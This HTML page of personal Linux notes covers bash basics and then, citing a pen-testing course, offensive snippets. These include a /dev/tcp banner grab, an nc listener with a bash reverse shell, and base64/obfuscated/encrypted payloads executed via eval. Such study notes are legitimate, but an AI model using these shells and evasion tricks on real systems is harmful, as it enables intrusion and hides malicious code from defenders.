<!DOCTYPE html>
<html>
<head>
<title>linux_commands</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: "Open Sans", "JetBrains Mono", sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>Useful linux commands</h1>
<h2>Record console session with 'script'</h2>
<pre><code>script [OPTIONS] FILENAME

$ script output_1.txt
Script started, file is output_1.txt

$ date
Wed Aug  5 12:06:50 JST 2020

$ exit
exit
Script done, file is output_1.txt
</code></pre>

<h2>Record console session from a subshell</h2>
<pre><code>$ bash &gt; output.txt
</code></pre>

<h2>Turn the output file from the above command into something readable (it still needs tidying up though) or cat it to the terminal and copy and paste the output</h2>
<pre><code>cat output_1.txt | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b &gt; output_1a.txt
</code></pre>

<h2>Key file conditions</h2>
<pre><code>-e file: True if file exists.
-f file: True if file exists and is a regular file.
-d file: True if file exists and is a directory.
-r file: True if file exists and is readable.
-w file: True if file exists and is writable.
-x file: True if file exists and is executable.
-s file: True if file exists and has a size greater than zero.
-L file: True if file exists and is a symbolic link.
-N file: True if file exists and has been modified since it was last read.
</code></pre>

<h2>Job control</h2>
<pre><code>CTRL-z - suspend a foreground job; use before bg or fg
bg - put current job in background
fg - bring current job to foreground
jobs - list current jobs
kill - terminate job
stty tostop - stop a job if it attempts to send output to terminal emulator
suspend - suspend a job-control shell
wait - wait for background jobs to finish
</code></pre>

<h2>Co-processes</h2>
<ul>
<li>Connects stdin and stdout to terminal emulator/shell, but not stderr</li>
<li>Can be named or unnamed</li>
<li>Only one active co-process at a time</li>
</ul>
<p>Syntax:</p>
<pre><code>coproc command args
coproc name (command args;command args)
</code></pre>

<p>Example:</p>
<pre><code># Start a named co-process:
coproc testProc (echo 1;read aline;echo $aline)

# Show file descriptors:
echo ${testProc[@]}

# Show co-process PID:
echo $testProc_PID

# Read the first line of output and show it:
read out &lt;&amp;${testProc[0]}
echo $out

# Send the co-process some input:
echo nonsense &gt;&amp;${testProc[1]}

# Read a second line of output:
read out2 &lt;&amp;${testProc[0]}

# Show the second line of output:
echo $out2
</code></pre>

<h2>List system defined variables</h2>
<pre><code>set
env
printenv
</code></pre>

<h2>Key system defined variables</h2>
<ol>
<li>BASH_VERSION</li>
<li>BASH</li>
<li>PWD</li>
<li>OSTYPE</li>
<li>HOME</li>
<li>LANG</li>
<li>HOSTNAME</li>
<li>PATH</li>
<li>COLUMNS</li>
<li>USER</li>
</ol>
<h2>Other special variables</h2>
<p><img src="bash_special_variables.png" alt="Bash special variables" /></p>
<hr />
<h1>Bash - selected penetration testing commands</h1>
<p>See <a href="https://app.pluralsight.com/library/courses/bash-pen-testing/table-of-contents">Pluralsight - Pen Testing with Bash</a></p>
<h2>Network Reconnaissance and Enumeration</h2>
<h3>Banner grabbing</h3>
<pre><code>exec 3&lt;&gt;/dev/tcp/google.com/80
echo -e &quot;GET / HTTP/1.1\nHost: google.com\n\n&quot; &gt;&amp;3
cat &lt;&amp;3
</code></pre>

<h2>Establish a Foothold in a Network</h2>
<h3>Backdoor</h3>
<pre><code>SERVER: nc -lnvp 5780
CLIENT: /bin/bash -i &lt; /dev/tcp/127.0.0.1/5780 1&gt;&amp;0 
</code></pre>

<h3>Change MAC address</h3>
<p>See <a href="https://app.pluralsight.com/library/courses/bash-pen-testing/table-of-contents">Pluralsight - Pen Testing with Bash</a></p>
<h3>ARP spoofing</h3>
<p>See <a href="https://app.pluralsight.com/library/courses/bash-pen-testing/table-of-contents">Pluralsight - Pen Testing with Bash</a></p>
<h2>Establish a Foothold in a Host</h2>
<h3>Sudoers</h3>
<p>See <a href="https://app.pluralsight.com/library/courses/bash-pen-testing/table-of-contents">Pluralsight - Pen Testing with Bash</a></p>
<h2>Stealth</h2>
<h3>Encoding</h3>
<pre><code>base64 unencode.sh &gt; encoded.sh
eval &quot;$(base64 -d encoded.sh)&quot;
</code></pre>

<h3>Obfuscation</h3>
<p>Example:</p>
<pre><code>#!/bin/bash
a=$1
z='base64 -d'
t() {
    f=&quot;echo -e \&quot;$(echo $a | $z) \neval \\ \&quot;&quot;
    echo $f
}
z=$(t $a)
eval $(eval $z | tac)
</code></pre>

<h3>Encryption</h3>
<p>Example command line:</p>
<pre><code>openssl aes-256-cbc -a -salt -pbkdf2 -in secrets.txt -out secrets.txt.enc
openssl aes-256-cbc -d -a -pbkdf2 -in secrets.txt.enc -out secrets.txt.new
</code></pre>

<p>Example script:</p>
<pre><code>#!/bin/bash
# We ask the user to enter the passphrase, so that it is not hardcoded in the file
echo &quot;Please enter the passphrase:&quot;
read passphrase
# We validate the passphrase
if [[ -z $passphrase ]]; then
    echo &quot;Passphrase cannot be empty&quot;
    exit 1
fi
# Encrypted payload contents
encrypted_payload=&quot;U2FsdGVkX18dJ/wcjyjr8Gr7oxlZXQq64dL5LDuBWpFDWkBct9JfH+1Ii6RvC3oK&quot;
# Decryption code, the passphrase is mypassphrase
decrypted_payload=$(echo &quot;$encrypted_payload&quot; | openssl aes-256-cbc -d -pbkdf2 -iter 1000 -base64 -pass pass:$passphrase)
# Execute decrypted payload
eval $decrypted_payload
</code></pre>


</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
